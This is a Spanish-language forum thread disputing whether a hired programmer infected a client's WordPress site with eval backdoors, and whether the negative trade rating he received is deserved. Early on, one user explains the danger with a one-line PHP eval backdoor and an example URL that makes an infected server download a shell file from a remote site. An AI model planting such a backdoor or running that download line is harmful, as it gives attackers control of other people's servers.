Calificación negativa de tnc05

  • Autor Autor kanikase
  • Fecha de inicio Fecha de inicio
Estado

🔒 Este tema está cerrado para nuevas respuestas.

⏰ Solo el creador del tema puede solicitar la reapertura de sus propios temas, pero únicamente dentro de los 60 días previos a la última actualización.

el eval permite evaluar codigo PHP y ejecutarlo en el servidor...
PHP:
<?
eval($_GET['e']);
?>
si yo coloco eso en cualquier archivo PHP del servidor, puedo inyectarle cualquier codigo PHP que quiera y este se ejecutara en el servidor... ejemlo puedo hacer que lea un archivo remoto y lo cree en el servidor... ejemplo:
PHP:
www.sitio.com/archivoinfectado.php?e=file_put_contents('virus.php',file_get_contents('http://www.otrositio.com/shell.txt'));
y eso lo que hace es crear un archivo virus.php en el servidor infectado con el contenido de 404 Not Found y de esa forma basicamente estaria dentro del servidor con una shell o lo que sea... en mi ejemplo puse phpinfo(); (para que se ejecute) y esa funcion lo que hace es mostrarme la informacion de PHP...
El eval sin controlar es un peligro... es mas en muchos de los post por los cuales he participado por sitios hackeados/infectados les digo lo mismo, que busquen dentro de los archivos la cadena: eval, base64, etc... los cuales son comunes cuando infectan sitios...

No solo le infectaron el sitio lo mas seguro es que su sitio este siendo usado para redirecciones de otro sitio hackeado, como el caso del sitio a donde redireccionaba el sitio de tnc...

Bueno, yo previamente le hice unas reparaciones al mismo script (creo, es un crawler de videos xxx, un plugin que el desarrollador ya no da soporte), hace poco tiempo (o no tan poco, tengo que revisar la fecha), y puedo corroborar que en ese entonces el código eval en el archivo 404 no estaba, y no había forma de ejecutar código arbitrariamente. Lamentablemente no nos calificamos por ese negocio, todo bien pero lo hicimos por skype y creo que una regla dice que si el negocio es por skype no se puede calificar ni quejarse asique ni me gasto.

Pero, solo en el caso de que lo tomaran como valido, es un plugin sin mantenimiento, sin actualizaciones y el wp no se toca salvo que se rompa, por lo que tengo entendido. No puedo asegurar que tnc haya hecho alguna otra cosa mientras tanto, pero puedo decir que quien haya puesto esos eval lo hizo en este ultimo tiempo.

SI muestran los logs del ftp seguro se aclara. No entiendo por qué hicieron eso, pero tnc siempre fue un buen cliente, no se si realmente fue kanikase, solo se que, usar un eval para mover las K de visitas o joderle el sitio a tnc es realmente fácil (aclaro no digo que sea kanikase).

Igual recapitulando, el programador se retrasa de entrada (con sus razones), tincho lo acepta, cierran el negocio por la mitad. Después da justo con un hackeo...

Ahora, no entiendo, por qué si tnc sospecha, (y con justas razones) y no está satisfecho con el negocio no puede calificarlo de forma negativa, digo, si no le gusta su forma de trabajar y además de eso está convencido de que lo hackeó, por qué no le puede poner una negativa?...

Además para trabajar kanikase necesita el ftp, en general son los mismos datos de acceso a un panel, donde fácilmente se pueden resetear los logs.

Personalmente me resulta muy dudoso, tengas las calificaciones que tengas, acá el que más pierde es tnc, el programador por más que tenga justas razones, desde el minuto 0 que fue irresponsable. Aunque el cliente lo haya aceptado, después lo del hackeo... Y te dedicaste todo el post a decir "yo no fui, demostrá lo contrario" que desde dos puntos de vista puede ser, o estás segurisimo de que borraste todo los logs, o no fuiste vos.

Aún así es el riezgo de tener los datos del sitio, yo de entrada como programador cuando me dicen "me infectaste el sitio" en vez de decirle "como?", le digo, disculpame pero no es posible, me dediqué a hacer mi trabajo, pero desde ya mismo te ofrezco toda mi ayuda y conocimientos como programador para solucionar el problema. porque yo acepté los datos de tu ftp y me hice responsable de tu sitio desde que empecé a trabajar.

para terminar mi análisis y tratando de ser imparcial, critico de tnc la falta de revisión, a la hora de dar datos así como así, tardar en comprobar todo, agregando la mala comunicación por skype a la hora de decir "ok. chau" en vez de explicar todo o exigir la reparación de los daños causados en vez de meter negativa de una. Comprendo que creas que fué él, y yo también lo creería en vista de la situación expuesta en el post, pero dejaría un margen a un error de parte del programador, o algo por el estilo.

Aún así, completamente a favor de tnc porque se nota una presión sobre el post, y cosas poco habituales en la sección de aclaraciones.
 
No hay peor ciego que el que no quiere ver XD
 
Bueno, yo previamente le hice unas reparaciones al mismo script (creo, es un crawler de videos xxx, un plugin que el desarrollador ya no da soporte), hace poco tiempo (o no tan poco, tengo que revisar la fecha), y puedo corroborar que en ese entonces el código eval en el archivo 404 no estaba, y no había forma de ejecutar código arbitrariamente. Lamentablemente no nos calificamos por ese negocio, todo bien pero lo hicimos por skype y creo que una regla dice que si el negocio es por skype no se puede calificar ni quejarse asique ni me gasto.

entiendo lo que decis que el eval no aparece por arte de magia... pero si te hackean el sitio si aparece... aca le hackearon el sitio... redirecciona a un dominio chino y a otros sitios infectados tambien... es mas estas diciendo que tmb accediste al servidor de tnc :fatigue: ... por lo tanto puede ser cualquiera de los que accedio al servidor... o simplemente le hackearon el sitio...
 
Bueno, yo previamente le hice unas reparaciones al mismo script (creo, es un crawler de videos xxx, un plugin que el desarrollador ya no da soporte), hace poco tiempo (o no tan poco, tengo que revisar la fecha), y puedo corroborar que en ese entonces el código eval en el archivo 404 no estaba, y no había forma de ejecutar código arbitrariamente. Lamentablemente no nos calificamos por ese negocio, todo bien pero lo hicimos por skype y creo que una regla dice que si el negocio es por skype no se puede calificar ni quejarse asique ni me gasto.

Pero, solo en el caso de que lo tomaran como valido, es un plugin sin mantenimiento, sin actualizaciones y el wp no se toca salvo que se rompa, por lo que tengo entendido. No puedo asegurar que tnc haya hecho alguna otra cosa mientras tanto, pero puedo decir que quien haya puesto esos eval lo hizo en este ultimo tiempo.

SI muestran los logs del ftp seguro se aclara. No entiendo por qué hicieron eso, pero tnc siempre fue un buen cliente, no se si realmente fue kanikase, solo se que, usar un eval para mover las K de visitas o joderle el sitio a tnc es realmente fácil (aclaro no digo que sea kanikase).

Igual recapitulando, el programador se retrasa de entrada (con sus razones), tincho lo acepta, cierran el negocio por la mitad. Después da justo con un hackeo...

Ahora, no entiendo, por qué si tnc sospecha, (y con justas razones) y no está satisfecho con el negocio no puede calificarlo de forma negativa, digo, si no le gusta su forma de trabajar y además de eso está convencido de que lo hackeó, por qué no le puede poner una negativa?...

Además para trabajar kanikase necesita el ftp, en general son los mismos datos de acceso a un panel, donde fácilmente se pueden resetear los logs.

Personalmente me resulta muy dudoso, tengas las calificaciones que tengas, acá el que más pierde es tnc, el programador por más que tenga justas razones, desde el minuto 0 que fue irresponsable. Aunque el cliente lo haya aceptado, después lo del hackeo... Y te dedicaste todo el post a decir "yo no fui, demostrá lo contrario" que desde dos puntos de vista puede ser, o estás segurisimo de que borraste todo los logs, o no fuiste vos.

Aún así es el riezgo de tener los datos del sitio, yo de entrada como programador cuando me dicen "me infectaste el sitio" en vez de decirle "como?", le digo, disculpame pero no es posible, me dediqué a hacer mi trabajo, pero desde ya mismo te ofrezco toda mi ayuda y conocimientos como programador para solucionar el problema. porque yo acepté los datos de tu ftp y me hice responsable de tu sitio desde que empecé a trabajar.

para terminar mi análisis y tratando de ser imparcial, critico de tnc la falta de revisión, a la hora de dar datos así como así, tardar en comprobar todo, agregando la mala comunicación por skype a la hora de decir "ok. chau" en vez de explicar todo o exigir la reparación de los daños causados en vez de meter negativa de una. Comprendo que creas que fué él, y yo también lo creería en vista de la situación expuesta en el post, pero dejaría un margen a un error de parte del programador, o algo por el estilo.

Aún así, completamente a favor de tnc porque se nota una presión sobre el post, y cosas poco habituales en la sección de aclaraciones.

Al parecer solo leíste el principio. Desde páginas atrás dije que quería ver el log, porque estoy seguro de que no hice nada, y así tal vez serviría para comprobarlo.

Cuando el user me dice que le infecté el sitio, yo tenía la intensión de ayudarlo, de hecho por todo lo ocurrido, me ofrecí también a repararle el reproductor personalizado, porque una tube cambió y no estaba funcionando.

Cuando le pregunté que cómo estaba infectada la web, no me dijo, entonces, ¿cómo lo voy a ayudar yo? ya después que vinieron las amenazas de que se lo reparara o me calificaría negativo, es cuando decidí ya no ayudarle, y si quería calificar pues que calificara, y así abrir la aclaración, porque como ya dije, yo no hice nada.
 
No hay peor ciego que el que no quiere ver XD

Tus constantes desvirtúes y falta de respeto y consideración (que se están pasando totalmente por alto) por lo sucedido fue lo que me hizo ponerme del lado de tnc y no del tuyo (que tendría más sentido siendo que también soy programador).

Edito: Si realmente te hubiese interesado arreglar el problema, lo hubieras hecho antes de llegar a esta instancia.
 
P.D ya hay muchas pruebas para que se me retire la calificación, en cambio el user tnc05, ni SoLuIts han dado una sola prueba de que yo le haya infectado su sitio, solamente sus palabras.

- - - Actualizado - - -

Tus constantes desvirtúes y falta de respeto y consideración (que se están pasando totalmente por alto) por lo sucedido fue lo que me hizo ponerme del lado de tnc y no del tuyo (que tendría más sentido siendo que también soy programador).

Edito: Si realmente te hubiese interesado arreglar el problema, lo hubieras hecho antes de llegar a esta instancia.

Falta de respeto y consideración? :welcoming:
 
entiendo lo que decis que el eval no aparece por arte de magia... pero si te hackean el sitio si aparece... aca le hackearon el sitio... redirecciona a un dominio chino y a otros sitios infectados tambien... es mas estas diciendo que tmb accediste al servidor de tnc :fatigue: ... por lo tanto puede ser cualquiera de los que accedio al servidor... o simplemente le hackearon el sitio...

sep, hace unos meses atras, por eso digo, que sería bueno ver los logs del ftp que nadie puso todavía.

Ahora bien, me da toda la sensación de que estan presionando el post, esto nunca pasa en ningun tema, no aparecen cosas como "listo ya está todo aclarado" Suelen durar bastantes días los temas, yo creo que sería bueno esperar a ver quién tuvo acceso al ftp en ese tiempo. (No trato de acusar a nadie solo digo que se lo tomen con un poco más de paciencia, no todos estamos 24hs conectados y mirando todo).

Otra cosa que me llama la atención es la mala actitud en todo el tema del usuario kanikase, comprendo que tenga ciertas cuestiones y no viene a la negativa el retraso porque fué aceptado, pero si te hacen el favor de tolerarte unos días de retraso y... te enojas por una acusación más que válida (en el sentido de que cualquiera se enojaría, te pones unos segundos en el lugar del tnc y te das cuenta por que lo digo...) no te costaba nada tratar de arreglar las cosas en vez de buscar el conflicto.

No vi que no se fuera a publicar el log de ftp, el mismo kanikase lo pide, pero hay que darle tiempo a la gente.

De igual forma es solo una opinión, todo bien kanikase y tnc no tengo nada en contra de ninguno, espero que se solucione.

=== EDITO ===

vi la respuesta de kanikase, comprendo, igual en la foto pareciera que le cortaras el rostro, por eso lo dije 😛

=== EDITO x2 ===

Otra cosa que me llama la atención es que esté triplicado el eval, bien podría ser un bot que ande por ahí buscando wordpress vulnerables, les cargue el eval y lo notifique al que lo programó. Sino no se justifica el triplicado del eval. Cualquier persona duplicaría el eval en varios lugares diferentes, no en el mismo archivo uno al lado del otro.
 
Última edición:
Lo peor es que aseguraron que tu hiciste eso y lo otro, entonces me imagino que el otro programador debiera dar un reembolso porque no hizo su trabajo o tal vez merece una negativa :welcoming:

Lo peor es que ya ni van hablar, se les cayó el teatrito....
 
sep, hace unos meses atras, por eso digo, que sería bueno ver los logs del ftp que nadie puso todavía.

Ahora bien, me da toda la sensación de que estan presionando el post, esto nunca pasa en ningun tema, no aparecen cosas como "listo ya está todo aclarado" Suelen durar bastantes días los temas, yo creo que sería bueno esperar a ver quién tuvo acceso al ftp en ese tiempo. (No trato de acusar a nadie solo digo que se lo tomen con un poco más de paciencia, no todos estamos 24hs conectados y mirando todo).

Otra cosa que me llama la atención es la mala actitud en todo el tema del usuario kanikase, comprendo que tenga ciertas cuestiones y no viene a la negativa el retraso porque fué aceptado, pero si te hacen el favor de tolerarte unos días de retraso y... te enojas por una acusación más que válida (en el sentido de que cualquiera se enojaría, te pones unos segundos en el lugar del tnc y te das cuenta por que lo digo...) no te costaba nada tratar de arreglar las cosas en vez de buscar el conflicto.

No vi que no se fuera a publicar el log de ftp, el mismo kanikase lo pide, pero hay que darle tiempo a la gente.

De igual forma es solo una opinión, todo bien kanikase y tnc no tengo nada en contra de ninguno, espero que se solucione.

=== EDITO ===

vi la respuesta de kanikase, comprendo, igual en la foto pareciera que le cortaras el rostro, por eso lo dije 😛

Cualquier acusación errónea o equivocada sobre tu persona o trabajo, inicialmente la reacción sera molestia, ademas si Kanikase ya tenia dias trabajando en eso y lo acusan porque de hecho al menos eso es lo que Kanikase dijo, que ntc05 llego y le dijo, "me infectaste el sitio", es una acusacion directa y tambien afirmo que no le dio explicaciones y mostro una actitud despota diciendo "o me arreglas o te califico negativo", seguro en la misma molestia Kanikase se arriesgo a la negativa confiando en su inocencia o bien sabiendo que no hay pruebas que lo acusen.

Nadie esta forzando el tema, el problema es que la negativa esta mal puesta, porque solo se baso en una sospecha y no un hecho comprobado.

No todas las aclaraciones deben durar mucho tiempo.
 
pues segun indican las ultimas pruebas que dio el cicklow esto ya no fue error ni mala intencion de kanikase si no obra en un hacker el cual infecto el sitio de tnc5 y pues la negativa esta mal puesta ya que esta era por otro negocio.

a favor de retirar la negativa de kanikase
 
Si no existe prueba alguna de que fue él, la negativa sobra. Estaría bien si hubiera decidido ponerla por otro motivo como los retrasos, así se mostrara comprensivo vía Skype, estaría en su derecho.

Por otro lado es impensable que kanikase hiciera eso, al menos a propósito. Es obvio que no va a tachar su imagen por unas cuantas visitas.
 
Si no existe prueba alguna de que fue él, la negativa sobra. Estaría bien si hubiera decidido ponerla por otro motivo como los retrasos, así se mostrara comprensivo vía Skype, estaría en su derecho.

Por otro lado es impensable que kanikase hiciera eso, al menos a propósito. Es obvio que no va a tachar su imagen por unas cuantas visitas.

Pienso igual, sin embargo el problema de que hubieron 4 (C U A T R O) retrasos confirmados de tiempo, de que reparo 2 veces y lo tumbaba la web (mal hecho) y ademas, rompió una seccion del panel de wordpress al cambiar archivos, creo que si yo fuera el cliente hubiera puesto la negativa mucho antes.

Hace unos dias contraté a un programador y le explique detalladamente los cambios que necesito en mi web, si el mismo se retrasa del tiempo pactado, tengo todo el derecho de calificarlo así, hubiera pactado mas tiempo "por las dudas". Creo que cada dia hay mas incumplimiento e irresponsabilidad de muchos servicios del foro y habría que parar un poco con eso. Yo en 5 años del foro no tengo una sola negativa, cumplí al 100% con TODOS, y si no cumplí con alguien alguna vez, no solo le devolví el dinero, pedí disculpas sino que intente compensar las cosas como corresponde, siempre con buena actitud y profesionalismo. ESO es lo que amerita la calificación aquí, no tanto el hackeo.

Es mas voy avisando, el programador que contrate se acerca a su tiempo limite y no es "nuevo", si el dia pactado no entrega, abro uno de estos temas.
 
ya decia pòrque hay un $_POST['codigo3'] en los eval ( con el codigo1,codigo2 tambien )
con un codigo JS todo es posible.
la pregunta es como entraron a su servidor y pusieron eso o "como aparecio ese eval" porque no aparecen asi de la nada e.e
en mi caso esto me paso hace mucho tiempo no con codigos eval sino con codigos similares en mi foro mybb.
Segun lo que me dijo el hosting fue que otro usuario hizo algo y afecto a los demas tal ves sea por eso.

Bueno vamos al punto creo que ya esta mas que aclarado que kanikase no fue verdad?, ya hasta dejaron la fecha .... .
 
Si pero es que esa parte ya sobra, los retrasos fueron malos y se sabe, y tnc05 hubiese podido calificarlo negativamente con todo su derecho pero eso ya en esta aclaración no tiene validez porque terminaron el negocio llegando a un acuerdo.
Solo faltan las pruebas de tnc05 de que kanikase lo hizo, no tengo idea si existe un programa u algo para eso soy tonto 🙁

Pienso igual, sin embargo el problema de que hubieron 4 (C U A T R O) retrasos confirmados de tiempo, de que reparo 2 veces y lo tumbaba la web (mal hecho) y ademas, rompió una seccion del panel de wordpress al cambiar archivos, creo que si yo fuera el cliente hubiera puesto la negativa mucho antes.

Hace unos dias contraté a un programador y le explique detalladamente los cambios que necesito en mi web, si el mismo se retrasa del tiempo pactado, tengo todo el derecho de calificarlo así, hubiera pactado mas tiempo "por las dudas". Creo que cada dia hay mas incumplimiento e irresponsabilidad de muchos servicios del foro y habría que parar un poco con eso. Yo en 5 años del foro no tengo una sola negativa, cumplí al 100% con TODOS, y si no cumplí con alguien alguna vez, no solo le devolví el dinero, pedí disculpas sino que intente compensar las cosas como corresponde, siempre con buena actitud y profesionalismo. ESO es lo que amerita la calificación aquí, no tanto el hackeo.

Es mas voy avisando, el programador que contrate se acerca a su tiempo limite y no es "nuevo", si el dia pactado no entrega, abro uno de estos temas.
 
La negativa está justificada.
 
Los retrasos no importan, ojo que hay usuarios en el foro que hacen pequeños trabajos de diseño y te instalan código oculto de cpa en el theme o los plugins, a mí me pasó.
 
Queda claro que lo más lógico para el usuario [MENTION=28762]tnc05[/MENTION] es que [MENTION=81006]kanikase[/MENTION] es el culpable del hackeo de su sitio independientemente si en la realidad lo fue o no, bajo su juicio el usuario con su falta de profesionalismo al tener 4 excusas para aplazar la fecha de entrega genera muchas dudas, bajo la lógica de tnc05 fue mucha coincidencia que aun cuando tiene mas de 70 sitios en el servidor donde está alojado el sitio del trabajo el único que hackearon fue al que el usuario kanikase ingreso, ahora bien en realidad entiendo el punto de vista de tnc05 y creo que gracias a este post y diferentes puntos de vista se pueden sacar varias conclusiones.

1. El usuario kanikase a pesar de su itrader y experiencia en el foro no fue muy profesional en realizar este trabajo, ademas con varios comentarios irónicos a las respuestas de otros usuarios deja mucho que desear.
2. La calificación negativa tiene justificación pero aclarada muchas cosas seguramente no la merezca, pero este post sirvio de ejercicio para conocer el actuar de la persona a la que califican.
3- Viendo la complejidad de la infección puede afirmar que alguno de los 2 usuarios tiene un virus en su pc, este virus aprovechando la conexión a ftp subió el código malicioso al sitio
4. Carlos Arreola definirá si realmente merece o no la calificación.
 
ya decia pòrque hay un $_POST['codigo3'] en los eval ( con el codigo1,codigo2 tambien )
con un codigo JS todo es posible.
la pregunta es como entraron a su servidor y pusieron eso o "como aparecio ese eval" porque no aparecen asi de la nada e.e
en mi caso esto me paso hace mucho tiempo no con codigos eval sino con codigos similares en mi foro mybb.
Segun lo que me dijo el hosting fue que otro usuario hizo algo y afecto a los demas tal ves sea por eso.

Bueno vamos al punto creo que ya esta mas que aclarado que kanikase no fue verdad?, ya hasta dejaron la fecha .... .

Queda claro que lo más lógico para el usuario [MENTION=28762]tnc05[/MENTION] es que [MENTION=81006]kanikase[/MENTION] es el culpable del hackeo de su sitio independientemente si en la realidad lo fue o no, bajo su juicio el usuario con su falta de profesionalismo al tener 4 excusas para aplazar la fecha de entrega genera muchas dudas, bajo la lógica de tnc05 fue mucha coincidencia que aun cuando tiene mas de 70 sitios en el servidor donde está alojado el sitio del trabajo el único que hackearon fue al que el usuario kanikase ingreso, ahora bien en realidad entiendo el punto de vista de tnc05 y creo que gracias a este post y diferentes puntos de vista se pueden sacar varias conclusiones.

1. El usuario kanikase a pesar de su itrader y experiencia en el foro no fue muy profesional en realizar este trabajo, ademas con varios comentarios irónicos a las respuestas de otros usuarios deja mucho que desear.
2. La calificación negativa tiene justificación pero aclarada muchas cosas seguramente no la merezca, pero este post sirvio de ejercicio para conocer el actuar de la persona a la que califican.
3- Viendo la complejidad de la infección puede afirmar que alguno de los 2 usuarios tiene un virus en su pc, este virus aprovechando la conexión a ftp subió el código malicioso al sitio
4. Carlos Arreola definirá si realmente merece o no la calificación.

Si pero Cicklow ya puso varias pruebas de que ntc05 pudo haber sido hackeado, incluso en algunos comentarios lo afirmo directamente.

Ademas la cuestión de los retrasos ntc05 también los acepto, llegando a un acuerdo a largo plazo, incluso acepto que la pagina quedara con errores o inconclusa en su administracion.

También han habido varios comentarios que muestran, que mas de una persona a tocado esa pagina web. Ademas es una web porno, paginas que los hackers prefieren para infectar.
 
Lee lo que escribí antes de citarme papu
3- Viendo la complejidad de la infección puede afirmar que alguno de los 2 usuarios tiene un virus en su pc, este virus aprovechando la conexión a ftp subió el código malicioso al sitio

Si pero Cicklow ya puso varias pruebas de que ntc05 pudo haber sido hackeado, incluso en algunos comentarios lo afirmo directamente.

Ademas la cuestión de los retrasos ntc05 también los acepto, llegando a un acuerdo a largo plazo, incluso acepto que la pagina quedara con errores o inconclusa en su administracion.

También han habido varios comentarios que muestran, que mas de una persona a tocado esa pagina web. Ademas es una web porno, paginas que los hackers prefieren para infectar.
 
Estado

🔒 Este tema está cerrado para nuevas respuestas.

⏰ Solo el creador del tema puede solicitar la reapertura de sus propios temas, pero únicamente dentro de los 60 días previos a la última actualización.

Atrás
Arriba